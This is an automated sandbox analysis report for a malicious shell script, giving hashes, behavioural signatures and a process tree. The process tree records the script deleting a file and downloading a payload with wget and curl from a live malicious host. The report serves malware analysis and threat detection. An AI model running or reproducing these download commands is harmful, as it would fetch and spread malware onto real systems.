Analysis

  • max time kernel
    148s
  • max time network
    17s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28/10/2024, 02:13

General

  • Target

    1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh

  • Size

    10KB

  • MD5

    85d74baef7ce93fd942b1abca31bf2dd

  • SHA1

    a7e677437c07ce76e9242021261bc10ae3c1728e

  • SHA256

    1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1

  • SHA512

    01166c5328b88a37c6f813c2c230bfb8ab099386a4d9d45d663902833009e012859aa7452ea9d9bff524dc0bf6f3dd938c0df0225b65ece29ab5a364e10a5677

  • SSDEEP

    192:ffd11BAjT2qH0+mhJy/EN71BAjTx9wrKS:ffdJqU+mhJy/ENqyrKS

Score
4/10

Malware Config

Signatures

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
    /tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
    1⤵
      PID:641
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:643
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          2⤵
          • System Network Configuration Discovery
          PID:645
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:655

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads